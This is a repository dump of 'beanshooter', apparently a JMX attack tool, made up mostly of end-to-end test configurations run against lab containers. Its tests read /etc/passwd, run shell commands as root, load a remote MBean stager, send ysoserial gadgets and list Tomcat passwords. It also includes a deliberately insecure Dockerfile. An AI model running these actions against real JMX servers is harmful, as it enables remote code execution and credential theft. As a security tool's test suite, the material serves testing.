javac -cp "${1}" -d "${COMPILED}" "${SOURCE}" 22 | CLASSNAME=$(find "${COMPILED}" -type f | grep ${2%.java} | sed "s@${COMPILED}@@" | sed "s@/@.@g") 23 | echo "BeanshooterPluginClass: ${CLASSNAME%.class}" > "${MANIFEST}" 24 | jar -cfm "${3}" "${MANIFEST}" -C "${COMPILED}" . 25 | 26 | rm -r "${TEMP}" 27 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/version/jmxmp/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka version action (JMXMP) 3 | description: |- 4 | Perform tests on beanshooters tonka version action for JMXMP based connections 5 | 6 | id: '03-02-02' 7 | groups: 8 | - jmxmp 9 | id_pattern: '03-02-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Plain version call 14 | description: |- 15 | Call the version function on the tonka bean 16 | 17 | command: 18 | - beanshooter 19 | - tonka 20 | - version 21 | - ${JMXMP_CRAM} 22 | - ${OPTIONS} 23 | - --username 24 | - controlRole 25 | - --password 26 | - control 27 | 28 | validators: 29 | - error: False 30 | - regex: 31 | match: 32 | - 'TonkaBean v.+ on Java v.+' 33 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/invoke/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat invoke action 3 | description: |- 4 | Perform the invoke action within the submenu of the tomcat 5 | operation. 6 | 7 | id: '10-05' 8 | groups: 9 | - invoke 10 | id_pattern: '10-05-{:02}' 11 | 12 | tests: 13 | - title: Invoke 14 | description: |- 15 | Use the invoke operation to invoke the findUser method. 16 | 17 | command: 18 | - beanshooter 19 | - tomcat 20 | - invoke 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - --signature 24 | - 'java.lang.String findUser(java.lang.String username)' 25 | - admin 26 | 27 | validators: 28 | - error: False 29 | - contains: 30 | values: 31 | - 'Users:type=User,username="admin",database=UserDatabase' 32 | -------------------------------------------------------------------------------- /tests/jolokia/basic/list/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: list action 3 | description: |- 4 | Perform tests on beanshooters list action 5 | 6 | id: '15-07' 7 | groups: 8 | - list 9 | - target 10 | id_pattern: '15-07-01-{:02}' 11 | 12 | tests: 13 | - title: List Jolokia 14 | description: |- 15 | Performs the list action on the Jolokia endpoint 16 | 17 | command: 18 | - beanshooter 19 | - list 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'Available MBeans:' 28 | - 'javax.management.MBeanServerDelegate (JMImplementation:type=MBeanServerDelegate)' 29 | - 'sun.management.MemoryManagerImpl (java.lang:name=Metaspace Manager,type=MemoryManager)' 30 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/undeploy/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka undeploy action 3 | description: |- 4 | Perform tests on beanshooters tonka undeploy action 5 | 6 | id: '03-08' 7 | groups: 8 | - undeploy 9 | 10 | tests: 11 | - title: Deploy if not deployed 12 | description: |- 13 | Deploy the tonka bean if it was not already deployed 14 | 15 | command: 16 | - beanshooter 17 | - tonka 18 | - deploy 19 | - ${TARGET_UNAUTH} 20 | - ${OPTIONS} 21 | - --stager-url 22 | - 'http://${DOCKER-GW}:8000' 23 | 24 | validators: 25 | - error: False 26 | - regex: 27 | match: 28 | - 'MBean with object name MLetTonkaBean:name=TonkaBean,id=1 (was successfully|is already) deployed' 29 | 30 | testers: 31 | - ./rmi/tricot.yml 32 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/dump/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot dump action (RMI) 3 | description: |- 4 | Perform tests on beanshooters hotspot dump action for RMI based connections 5 | 6 | id: '08-01-01' 7 | groups: 8 | - rmi 9 | id_pattern: '08-01-01-{:02}' 10 | 11 | tests: 12 | - title: Create a heapdump 13 | description: |- 14 | Create a heapdump 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - dump 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - ${volume-d}/dump.hprof 23 | 24 | validators: 25 | - error: False 26 | - regex: 27 | match: 28 | - 'Heapdump file .+ was created successfully' 29 | - file_exists: 30 | cleanup: True 31 | files: 32 | - ${volume}/dump.hprof 33 | -------------------------------------------------------------------------------- /tests/tomcat-server/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: MBean releated tests (tomcat) 3 | description: |- 4 | This folder contains some MBean related tests for MBeans that are available 5 | per default on Apache tomcat. 6 | 7 | groups: 8 | - mbeans 9 | 10 | containers: 11 | - name: 'tomcat-example-server' 12 | image: 'ghcr.io/qtc-de/beanshooter/tomcat-example-server:2.0' 13 | volumes: 14 | - '${volume}:${volume-d}' 15 | aliases: 16 | DOCKER-tomcat-example-server-IP: DOCKER-IP 17 | DOCKER-tomcat-example-server-GATEWAY: DOCKER-GW 18 | init: 5 19 | 20 | variables: 21 | TARGET: 22 | - ${DOCKER-IP} 23 | - 1090 24 | 25 | testers: 26 | - ./tomcat/tricot.yml 27 | - ./diagnostic/tricot.yml 28 | - ./mlet/tricot.yml 29 | - ./hotspot/tricot.yml 30 | - ./recorder/tricot.yml 31 | -------------------------------------------------------------------------------- /tests/jolokia/hotspot/dump/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot dump action 3 | description: |- 4 | Perform tests on beanshooters hotspot dump action 5 | 6 | id: '13-01' 7 | groups: 8 | - dump 9 | id_pattern: '13-01-01-{:02}' 10 | 11 | tests: 12 | - title: Create a heapdump 13 | description: |- 14 | Create a heapdump 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - dump 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - ${volume-d}/dump.hprof 23 | 24 | validators: 25 | - error: False 26 | - regex: 27 | match: 28 | - 'Heapdump file .+ was created successfully' 29 | - file_exists: 30 | cleanup: True 31 | files: 32 | - ${volume}/dump.hprof 33 | 34 | testers: 35 | - ./error/tricot.yml 36 | -------------------------------------------------------------------------------- /tests/jolokia/basic/enum/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: enum action (Error) 3 | description: |- 4 | Perform tests on beanshooters error handling for the enum action 5 | 6 | id: '15-04-02' 7 | groups: 8 | - error 9 | id_pattern: '15-04-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Wrong Credentials 14 | description: |- 15 | Invoke the enum actio with wrong credentials 16 | 17 | command: 18 | - beanshooter 19 | - enum 20 | - ${TARGET_NO_AUTH} 21 | - ${OPTIONS} 22 | - --username 23 | - harry 24 | - --password 25 | - hirsch 26 | 27 | validators: 28 | - error: False 29 | - contains: 30 | values: 31 | - Caught AuthenticationException during login attempt 32 | - The specified credentials are probably invalid 33 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/read/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic read action (RMI) 3 | description: |- 4 | Perform tests on beanshooters diagnostic read action for RMI based connections 5 | 6 | id: '06-01-01' 7 | groups: 8 | - rmi 9 | id_pattern: '06-01-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Read /etc/passwd 14 | description: |- 15 | Attempt to read /etc/passwd from the server 16 | 17 | command: 18 | - beanshooter 19 | - diagnostic 20 | - read 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - /etc/passwd 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'root:x:0:0:root:/root:/bin/bash' 30 | - 'nats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin' 31 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/invoke/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat invoke action (RMI) 3 | description: |- 4 | Perform tests on the invoke action within the submenu of the tomcat operation. 5 | 6 | id: '05-05-01' 7 | groups: 8 | - rmi 9 | id_pattern: '05-05-01-{:02}' 10 | 11 | tests: 12 | - title: Invoke 13 | description: |- 14 | Use the invoke operation to invoke the findUser method. 15 | 16 | command: 17 | - beanshooter 18 | - tomcat 19 | - invoke 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - --signature 23 | - 'java.lang.String findUser(java.lang.String username)' 24 | - admin 25 | 26 | validators: 27 | - error: False 28 | - contains: 29 | values: 30 | - 'Users:type=User,username="admin",database=UserDatabase' 31 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/dump/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot dump action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters hotspot dump action 5 | 6 | id: '08-01-02' 7 | groups: 8 | - error 9 | id_pattern: '08-01-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Non extisting dir 14 | description: |- 15 | Attempt to create the dump in a non existing dir 16 | 17 | command: 18 | - beanshooter 19 | - hotspot 20 | - dump 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - /nonono/nonono.hprof 24 | 25 | validators: 26 | - error: True 27 | - contains: 28 | values: 29 | - 'Saving heapdump on the server caused an IOException' 30 | - 'The parent directory of' 31 | - 'seems not to exist' 32 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/exec/jmxmp/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka exec action (JMXMP) 3 | description: |- 4 | Perform tests on beanshooters tonka exec action for JMXMP based connections 5 | 6 | id: '03-04-02' 7 | groups: 8 | - jmxmp 9 | id_pattern: '03-04-02-{:02}' 10 | 11 | tests: 12 | - title: Exec id 13 | description: |- 14 | Execute the id command on the MBeanServer 15 | 16 | command: 17 | - beanshooter 18 | - tonka 19 | - exec 20 | - ${JMXMP_NTLM} 21 | - ${OPTIONS} 22 | - id 23 | - --username 24 | - controlRole 25 | - --password 26 | - control 27 | 28 | validators: 29 | - error: False 30 | - contains: 31 | values: 32 | - 'The call was successful' 33 | - 'uid=0(root) gid=0(root) groups=0(root)' 34 | -------------------------------------------------------------------------------- /tests/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | name: beanshooter 3 | title: beanshooter tests 4 | error_mode: break 5 | description: |- 6 | Launches some end-to-end tests for beanshooter 7 | 8 | requires: 9 | files: 10 | - /opt/yso.jar 11 | commands: 12 | - beanshooter 13 | - curl 14 | - head 15 | - xxd 16 | tricot: 17 | ge: 1.10.2 18 | 19 | variables: 20 | volume: /tmp/beanshooter-tricot-test/ 21 | volume-d: /rce/ 22 | OPTIONS: 23 | - --no-color 24 | 25 | plugins: 26 | - mkdir: 27 | force: false 28 | cleanup: true 29 | dirs: 30 | - ${volume} 31 | 32 | testers: 33 | - ./jmx-example-server/tricot.yml 34 | - ./serverless/tricot.yml 35 | - ./jmx-example-server-2/tricot.yml 36 | - ./tomcat-server/tricot.yml 37 | - ./jolokia/tricot.yml 38 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/plugin/IAuthenticationProvider.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.plugin; 2 | 3 | import java.util.Map; 4 | 5 | import de.qtc.beanshooter.exceptions.PluginException; 6 | 7 | /** 8 | * Create the JMX environment that is used during the newClient call. The default JMX implementation 9 | * expects the returned Map to contain the key JMXConnector.CREDENTIALS with an associated String array 10 | * containing the username and the password. However, custom implementations may expect a different 11 | * format. Therefore, providing the Map through the plugin system allows users to modify the default 12 | * behavior. 13 | * 14 | * @author Tobias Neitzel (@qtc_de) 15 | */ 16 | public interface IAuthenticationProvider 17 | { 18 | public Map getEnv(String username, String password) throws PluginException; 19 | } 20 | -------------------------------------------------------------------------------- /tests/jmx-example-server/serial/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: serial action (Error) 3 | description: |- 4 | Perform tests on beanshooters error handling for the serial action 5 | 6 | id: '01-06-03' 7 | groups: 8 | - error 9 | id_pattern: '01-06-03-{:02}' 10 | 11 | 12 | tests: 13 | - title: Wrong gadget name 14 | description: |- 15 | Use a non existing gadget name 16 | 17 | command: 18 | - beanshooter 19 | - serial 20 | - ${JMXMP_UNAUTH} 21 | - ${OPTIONS} 22 | - CommonsCollections1337 23 | - 'touch ${volume-d}/${file}' 24 | 25 | validators: 26 | - error: True 27 | - contains: 28 | values: 29 | - Caught unexpected java.lang.reflect.InvocationTargetException 30 | - You probably specified a wrong gadget name or an invalid gadget argument 31 | -------------------------------------------------------------------------------- /beanshooter/config.properties: -------------------------------------------------------------------------------- 1 | yso=/opt/yso.jar 2 | brute_threads=5 3 | keywords=passw creds credentials secret key codebase url path file 4 | methodKeywords=read write dump exec system command cmd passw creds credentials secret key codebase url path file 5 | defaultMBeans=javax.management.MBeanServerDelegate sun.management.BaseOperatingSystemImpl sun.management.ClassLoadingImpl sun.management.CompilationImpl sun.management.GarbageCollectorImpl sun.management.ManagementFactoryHelper$1 sun.management.ManagementFactoryHelper$PlatformLoggingImpl sun.management.MemoryImpl sun.management.MemoryManagerImpl sun.management.MemoryPoolImpl sun.management.RuntimeImpl sun.management.ThreadImpl com.sun.management.internal.OperatingSystemImpl com.sun.management.internal.HotSpotThreadImpl com.sun.management.internal.GarbageCollectorExtImpl com.sun.management.internal.GarbageCollectorExtImpl 6 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/status/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka status action 3 | description: |- 4 | Perform tests on beanshooters tonka status action 5 | 6 | id: '03-03' 7 | groups: 8 | - status 9 | 10 | 11 | tests: 12 | - title: Deploy if not deployed 13 | description: |- 14 | DEploy the tonka bean if it was not already deployed 15 | 16 | command: 17 | - beanshooter 18 | - tonka 19 | - deploy 20 | - ${TARGET_UNAUTH} 21 | - ${OPTIONS} 22 | - --stager-url 23 | - 'http://${DOCKER-GW}:8000' 24 | 25 | validators: 26 | - error: False 27 | - regex: 28 | match: 29 | - 'MBean with object name MLetTonkaBean:name=TonkaBean,id=1 (was successfully|is already) deployed' 30 | 31 | 32 | testers: 33 | - ./rmi/tricot.yml 34 | - ./jmxmp/tricot.yml 35 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/version/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka version action 3 | description: |- 4 | Perform tests on beanshooters tonka version action 5 | 6 | id: '03-02' 7 | groups: 8 | - version 9 | 10 | 11 | tests: 12 | - title: Deploy if not deployed 13 | description: |- 14 | DEploy the tonka bean if it was not already deployed 15 | 16 | command: 17 | - beanshooter 18 | - tonka 19 | - deploy 20 | - ${TARGET_UNAUTH} 21 | - ${OPTIONS} 22 | - --stager-url 23 | - 'http://${DOCKER-GW}:8000' 24 | 25 | validators: 26 | - error: False 27 | - regex: 28 | match: 29 | - 'MBean with object name MLetTonkaBean:name=TonkaBean,id=1 (was successfully|is already) deployed' 30 | 31 | 32 | testers: 33 | - ./rmi/tricot.yml 34 | - ./jmxmp/tricot.yml 35 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/execarray/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka execarray action 3 | description: |- 4 | Perform tests on beanshooters tonka execarray action 5 | 6 | id: '03-05' 7 | groups: 8 | - execarray 9 | 10 | 11 | tests: 12 | - title: Deploy if not deployed 13 | description: |- 14 | DEploy the tonka bean if it was not already deployed 15 | 16 | command: 17 | - beanshooter 18 | - tonka 19 | - deploy 20 | - ${TARGET_UNAUTH} 21 | - ${OPTIONS} 22 | - --stager-url 23 | - 'http://${DOCKER-GW}:8000' 24 | 25 | validators: 26 | - error: False 27 | - regex: 28 | match: 29 | - 'MBean with object name MLetTonkaBean:name=TonkaBean,id=1 (was successfully|is already) deployed' 30 | 31 | 32 | testers: 33 | - ./rmi/tricot.yml 34 | - ./jmxmp/tricot.yml 35 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/Starter.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter; 2 | 3 | import de.qtc.beanshooter.cli.ArgumentHandler; 4 | import de.qtc.beanshooter.cli.Operation; 5 | import de.qtc.beanshooter.utils.Utils; 6 | 7 | /** 8 | * The Stater class handles the startup process of beanshooter. beanshooter actions 9 | * are invoked via reflection. This adds one additional layer of complexity but allows 10 | * to define available actions in an enum, which makes it more explicit what actions are 11 | * actually available. 12 | * 13 | * @author Tobias Neitzel (@qtc_de) 14 | */ 15 | public class Starter 16 | { 17 | public static void main(String[] argv) 18 | { 19 | ArgumentHandler handler = new ArgumentHandler(argv); 20 | Utils.disableWarning(); 21 | Operation operation = handler.getAction(); 22 | operation.invoke(); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/mbean/hotspot/HotSpotDiagnosticMXBean.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.mbean.hotspot; 2 | 3 | import javax.management.MBeanException; 4 | import javax.management.openmbean.CompositeData; 5 | 6 | import de.qtc.beanshooter.mbean.INative; 7 | 8 | /** 9 | * Interface of available HotSpotDiagnosticMXBean operations. Since we only implement a subset of the 10 | * actually available operations exposed by this MBean, we use a custom interface instead of the original 11 | * one. 12 | * 13 | * @author Tobias Neitzel (@qtc_de) 14 | */ 15 | public interface HotSpotDiagnosticMXBean extends INative 16 | { 17 | public void dumpHeap(String outputFile, boolean live) throws MBeanException; 18 | public CompositeData getVMOption(String name) throws MBeanException; 19 | public void setVMOption(String name, String value) throws MBeanException; 20 | } 21 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/exec/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka exec action 3 | description: |- 4 | Perform tests on beanshooters tonka exec action 5 | 6 | id: '03-04' 7 | groups: 8 | - exec 9 | 10 | 11 | tests: 12 | - title: Deploy if not deployed 13 | description: |- 14 | DEploy the tonka bean if it was not already deployed 15 | 16 | command: 17 | - beanshooter 18 | - tonka 19 | - deploy 20 | - ${TARGET_UNAUTH} 21 | - ${OPTIONS} 22 | - --stager-url 23 | - 'http://${DOCKER-GW}:8000' 24 | 25 | validators: 26 | - error: False 27 | - regex: 28 | match: 29 | - 'MBean with object name MLetTonkaBean:name=TonkaBean,id=1 (was successfully|is already) deployed' 30 | 31 | 32 | testers: 33 | - ./rmi/tricot.yml 34 | - ./jmxmp/tricot.yml 35 | - ./error/tricot.yml 36 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/upload/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka upload action 3 | description: |- 4 | Perform tests on beanshooters tonka upload action 5 | 6 | id: '03-07' 7 | groups: 8 | - upload 9 | 10 | 11 | tests: 12 | - title: Deploy if not deployed 13 | description: |- 14 | Deploy the tonka bean if it was not already deployed 15 | 16 | command: 17 | - beanshooter 18 | - tonka 19 | - deploy 20 | - ${TARGET_UNAUTH} 21 | - ${OPTIONS} 22 | - --stager-url 23 | - 'http://${DOCKER-GW}:8000' 24 | 25 | validators: 26 | - error: False 27 | - regex: 28 | match: 29 | - 'MBean with object name MLetTonkaBean:name=TonkaBean,id=1 (was successfully|is already) deployed' 30 | 31 | 32 | testers: 33 | - ./rmi/tricot.yml 34 | - ./jmxmp/tricot.yml 35 | - ./error/tricot.yml 36 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/download/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka download action 3 | description: |- 4 | Perform tests on beanshooters tonka download action 5 | 6 | id: '03-06' 7 | groups: 8 | - download 9 | 10 | 11 | tests: 12 | - title: Deploy if not deployed 13 | description: |- 14 | DEploy the tonka bean if it was not already deployed 15 | 16 | command: 17 | - beanshooter 18 | - tonka 19 | - deploy 20 | - ${TARGET_UNAUTH} 21 | - ${OPTIONS} 22 | - --stager-url 23 | - 'http://${DOCKER-GW}:8000' 24 | 25 | validators: 26 | - error: False 27 | - regex: 28 | match: 29 | - 'MBean with object name MLetTonkaBean:name=TonkaBean,id=1 (was successfully|is already) deployed' 30 | 31 | 32 | testers: 33 | - ./rmi/tricot.yml 34 | - ./jmxmp/tricot.yml 35 | - ./error/tricot.yml 36 | -------------------------------------------------------------------------------- /.github/workflows/feat.yml: -------------------------------------------------------------------------------- 1 | name: feature branch maven CI 2 | 3 | on: 4 | push: 5 | branches: 6 | - 'feat/**' 7 | paths: 8 | - 'beanshooter/pom.xml' 9 | - 'beanshooter/src/**' 10 | - 'tonka-bean/pom.xml' 11 | - 'tonka-bean/src/**' 12 | - 'pom.xml' 13 | 14 | jobs: 15 | build: 16 | 17 | runs-on: ubuntu-latest 18 | 19 | steps: 20 | 21 | - uses: actions/checkout@v2 22 | 23 | - name: Set up JDK 1.8 24 | uses: actions/setup-java@v1 25 | with: 26 | java-version: 1.8 27 | 28 | - name: Cache local Maven repository 29 | uses: actions/cache@v2 30 | with: 31 | path: ~/.m2/repository 32 | key: ${{ runner.os }}-maven-${{ hashFiles('**/pom.xml') }} 33 | restore-keys: | 34 | ${{ runner.os }}-maven- 35 | 36 | - name: Build with Maven 37 | run: mvn -B package --file pom.xml 38 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/execarray/jmxmp/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka execarray action (JMXMP) 3 | description: |- 4 | Perform tests on beanshooters tonka execarray action for JMXMP based connections 5 | 6 | id: '03-05-02' 7 | groups: 8 | - jmxmp 9 | id_pattern: '03-05-02-{:02}' 10 | 11 | tests: 12 | - title: Exec echo $HOME 13 | description: |- 14 | Execute the shell command echo $HOME 15 | 16 | command: 17 | - beanshooter 18 | - tonka 19 | - execarray 20 | - ${JMXMP_NTLM} 21 | - ${OPTIONS} 22 | - --username 23 | - controlRole 24 | - --password 25 | - control 26 | - -- 27 | - sh 28 | - -c 29 | - 'echo $HOME' 30 | 31 | validators: 32 | - error: False 33 | - contains: 34 | values: 35 | - 'The call was successful' 36 | - '/root' 37 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/list/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat list action 3 | description: |- 4 | Perform tests on beanshooters tomcat list action 5 | 6 | id: '10-06' 7 | groups: 8 | - list 9 | id_pattern: '10-06-01-{:02}' 10 | 11 | tests: 12 | - title: Invoke list action 13 | description: |- 14 | Use the list action on the tomcat JMX endpoint 15 | 16 | command: 17 | - beanshooter 18 | - tomcat 19 | - list 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'Listing tomcat users:' 28 | - 'manager' 29 | - 'admin' 30 | - 's3cr3T!$' 31 | - 'status' 32 | - 'cr@cKM3o.O' 33 | - 'Users:type=Role,rolename="manager-gui",database=UserDatabase' 34 | 35 | testers: 36 | - ./error/tricot.yml 37 | -------------------------------------------------------------------------------- /docker/tomcat/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tomcat:jre17-temurin 2 | 3 | COPY ./resources/trust/store.p12 \ 4 | ./resources/scripts/start.sh \ 5 | /opt/ 6 | 7 | COPY ./resources/conf/tomcat-users.xml \ 8 | /usr/local/tomcat/conf/tomcat-users.xml 9 | 10 | RUN set -ex \ 11 | && chmod +x /opt/start.sh 12 | 13 | ENV _JAVA_OPTIONS -Djava.rmi.server.hostname=iinsecure.example \ 14 | -Djavax.net.ssl.keyStorePassword=password \ 15 | -Djavax.net.ssl.keyStore=/opt/store.p12 \ 16 | -Djavax.net.ssl.keyStoreType=pkcs12 \ 17 | -Dcom.sun.management.jmxremote \ 18 | -Dcom.sun.management.jmxremote.ssl=false \ 19 | -Dcom.sun.management.jmxremote.local.only=false \ 20 | -Dcom.sun.management.jmxremote.authenticate=false \ 21 | -Dcom.sun.management.jmxremote.port=1090 \ 22 | -Dcom.sun.management.jmxremote.rmi.port=1099 23 | 24 | EXPOSE 1090/tcp 1099/tcp 8080/tcp 25 | 26 | CMD ["/opt/start.sh"] 27 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/status/jmxmp/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka status action (JMXMP) 3 | description: |- 4 | Perform tests on beanshooters tonka status action for JMXMP based connections 5 | 6 | id: '03-03-02' 7 | groups: 8 | - jmxmp 9 | id_pattern: '03-03-02-{:02}' 10 | 11 | tests: 12 | - title: Plain status call 13 | description: |- 14 | Call the status action on a deployed tonka bean 15 | 16 | command: 17 | - beanshooter 18 | - tonka 19 | - status 20 | - ${JMXMP_NTLM} 21 | - ${OPTIONS} 22 | - --username 23 | - controlRole 24 | - --password 25 | - control 26 | 27 | validators: 28 | - error: False 29 | - contains: 30 | values: 31 | - 'MBean Status: deployed' 32 | - 'Class Name: de.qtc.beanshooter.tonkabean.TonkaBean' 33 | - 'Object Name: MLetTonkaBean:name=TonkaBean,id=1' 34 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/list/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat list action (RMI) 3 | description: |- 4 | Perform tests on beanshooters tomcat list action for RMI based connections 5 | 6 | id: '05-06-01' 7 | groups: 8 | - rmi 9 | id_pattern: '05-06-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Invoke list action 14 | description: |- 15 | Use the list action on the tomcat JMX endpoint 16 | 17 | command: 18 | - beanshooter 19 | - tomcat 20 | - list 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'Listing tomcat users:' 29 | - 'manager' 30 | - 'P@55w0rD#' 31 | - 'admin' 32 | - 's3cr3T!$' 33 | - 'status' 34 | - 'cr@cKM3o.O' 35 | - 'Users:type=Role,rolename="manager-gui",database=UserDatabase' 36 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/plugin/providers/YsoSerialProvider.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.plugin.providers; 2 | 3 | import de.qtc.beanshooter.cli.Operation; 4 | import de.qtc.beanshooter.plugin.IPayloadProvider; 5 | import de.qtc.beanshooter.utils.YsoIntegration; 6 | 7 | /** 8 | * beanshooters default implementation for a payload provider is the YsoSerialProvider, 9 | * that generates ysoserial gadgets from the specified command line parameters. 10 | * 11 | * @author Tobias Neitzel (@qtc_de) 12 | */ 13 | public class YsoSerialProvider implements IPayloadProvider 14 | { 15 | /** 16 | * Generate a ysoserial gadget from the specified command line parameters. This provider 17 | * is independent of the action specified on the command line. 18 | */ 19 | public Object getPayloadObject(Operation action, String name, String args) 20 | { 21 | return YsoIntegration.getPayloadObject(name, args); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/info/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat info action 3 | description: |- 4 | Perform the info action within the submenu of the tomcat 5 | action. 6 | 7 | id: '10-04' 8 | groups: 9 | - info 10 | id_pattern: '10-04-{:02}' 11 | 12 | tests: 13 | - title: Info 14 | description: |- 15 | Use the info operation 16 | 17 | command: 18 | - beanshooter 19 | - tomcat 20 | - info 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'MBean Class: org.apache.catalina.mbeans.MemoryUserDatabaseMBean' 29 | - 'ObjectName: Users:type=UserDatabase,database=UserDatabase' 30 | - 'Attributes:' 31 | - 'Operations:' 32 | - 'pathname (type: java.lang.String , writable: true)' 33 | - 'java.lang.String findGroup(java.lang.String groupname)' 34 | -------------------------------------------------------------------------------- /.github/workflows/develop-example-server.yml: -------------------------------------------------------------------------------- 1 | name: example server - develop 2 | 3 | on: 4 | 5 | push: 6 | branches: 7 | - develop 8 | paths: 9 | - 'docker/jmx-example-server/**' 10 | 11 | pull_request: 12 | branches: 13 | - develop 14 | paths: 15 | - 'docker/jmx-example-server/**' 16 | 17 | jobs: 18 | build: 19 | runs-on: ubuntu-latest 20 | 21 | steps: 22 | - uses: actions/checkout@v2 23 | 24 | - name: Set up JDK 1.8 25 | uses: actions/setup-java@v1 26 | with: 27 | java-version: 1.8 28 | 29 | - name: Cache local Maven repository 30 | uses: actions/cache@v2 31 | with: 32 | path: ~/.m2/repository 33 | key: ${{ runner.os }}-maven-${{ hashFiles('**/pom.xml') }} 34 | restore-keys: | 35 | ${{ runner.os }}-maven- 36 | 37 | - name: Build with Maven 38 | run: cd docker/jmx-example-server/resources/server && mvn -B package --file pom.xml 39 | -------------------------------------------------------------------------------- /.github/workflows/master-example-server.yml: -------------------------------------------------------------------------------- 1 | name: example server - master 2 | 3 | on: 4 | 5 | push: 6 | branches: 7 | - master 8 | paths: 9 | - 'docker/jmx-example-server/**' 10 | 11 | pull_request: 12 | branches: 13 | - master 14 | paths: 15 | - 'docker/jmx-example-server/**' 16 | 17 | jobs: 18 | build: 19 | runs-on: ubuntu-latest 20 | 21 | steps: 22 | - uses: actions/checkout@v2 23 | 24 | - name: Set up JDK 1.8 25 | uses: actions/setup-java@v1 26 | with: 27 | java-version: 1.8 28 | 29 | - name: Cache local Maven repository 30 | uses: actions/cache@v2 31 | with: 32 | path: ~/.m2/repository 33 | key: ${{ runner.os }}-maven-${{ hashFiles('**/pom.xml') }} 34 | restore-keys: | 35 | ${{ runner.os }}-maven- 36 | 37 | - name: Build with Maven 38 | run: cd docker/jmx-example-server/resources/server && mvn -B package --file pom.xml 39 | -------------------------------------------------------------------------------- /tests/jolokia/diagnostic/cmdline/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic cmdline action 3 | description: |- 4 | Perform tests on beanshooters diagnostic cmdline action 5 | 6 | id: '11-01' 7 | 